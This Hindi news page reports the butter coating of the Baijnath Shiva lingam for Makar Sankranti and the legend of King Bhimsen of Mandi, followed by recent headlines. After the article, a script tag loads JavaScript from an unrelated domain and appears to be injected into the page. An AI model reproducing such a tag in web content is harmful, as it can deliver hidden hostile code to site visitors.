मंडी के राजा भीमसेन ने शिव की चेतावनी के बाद शुरू की माखन के लेप लगाने की परंपरा

<p>ऐतिहासिक शिव मंदिर बैजनाथ में मकर संक्रांति पर शिवलिंग का चार क्विंटल मक्खन से शृंगार किया गया है। 14 जनवरी की रात लोहड़ी पर्व पर घृतमंडल तैयार किया गया था। ये माखन अभी शिवलिंग पर है। सप्ताह भर शिवलिंग पर ये लेप चढ़ा रहेगा। लगभग 4 क्विंटल माखन से बने इस शिवलिंग को 5 फुट का बनाया गया है। इसका प्रसाद बाद में श्रद्धालुओं में बांटा जाएगा। माना जाता है कि इस मक्खन रूपी प्रसाद से चर्म रोग दूर होते हैं।</p>

<p>ऐसा माना जाता है कि कैलाश पर्वत पर सर्दी पड़ने पर भगवान भोले शंकर यहां आकर निवास करते हैं और उन्हें आराम देने के लिए शिवलिंग पर शुद्ध घी से तैयार किए गए मक्खन का लेप किया जाता है। मंडी के राजा भीमसेन भी घृत मंडल चढ़ाने बैजनाथ आते थे। भीमसेन ने मंडी के भूतनाथ मंदिर में स्थापित करने के लिए उखाड़ने की कोशिश की थी लेकिन शिव ने चेतावनी दी कि यदि शिवलिंग को उखाड़ा तो उसका सर्वनाश हो जाएगा।</p>

<p>इसके बाद राजा भीमसेन ने भूल को सुधारने के लिए यहां मकर संक्रांति पर मक्खन का लेप लगाने की परंपरा शुरू की थी जो यह आज भी जारी है। इस शिवलिंग को देखने के लिए आजकल श्रद्धालुओं की भीड़ जुटी हुई है। दूर-दूर से श्रद्धालु यहां इस पावन शिवलिंग के दर्शन कर अपने आप को धन्य समझ रहे हैं।</p>

<p><img src=”/media/gallery/images/image(2043).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

सीएम सुखविंद्र सिंह सुक्खू की तबीयत फिर बिगड़ी, आईजएमसी में हुआ उपचार

Shimla: मुख्यमंत्री सुखविंद्र सिंह सुक्खू की तबीयत फिर बिगड़ी है। मंगलवार रात को उपचार करवाने…

5 hours ago

पालमपुर कृषि विवि की 112 हेक्टेयर भूमि को पर्यटन विभाग के नाम पर हस्तांतरित करने पर हाईकोर्ट की रोक

  शिमला: चौधरी सरवण कुमार एग्रीकल्चर यूनिवर्सिटी पालमपुर की 112 हेक्टेयर लैंड को पर्यटन विभाग…

5 hours ago

उपचार के लिए क्षेत्रीय अस्पताल लाया गया विचाराधीन कैदी फरार

  UNA: जिला कारागार बनगढ़ से उपचार के लिए क्षेत्रीय अस्पताल लाया गया विचाराधीन कैदी…

7 hours ago

लापता लेडीज ऑस्कर के लिए नामांकित

  Chennai, Agencies: किरण राव की ‘लापता लेडीज’ को ऑस्कर पुरस्कार 2025 के लिए भारत…

8 hours ago

हिमाचल में किसानों को 50 प्रतिशत सब्सिडी पर 1100 में मिलेंगे साइकल-हल

  Hamirpur:  प्रदेश में किसानों को 50 प्रतिशत सब्सिडी पर साइकल-हल प्रदान किए जाएंगे। 2200…

9 hours ago

संजौली कॉलेज में SFI कार्यकर्ताओं और पुलिस बल में धक्का- मुक्की

  Shimla: 6 छात्र नेताओं के निष्कासन का मामला तूल पकड़ गया है। तनाव बढ़…

10 hours ago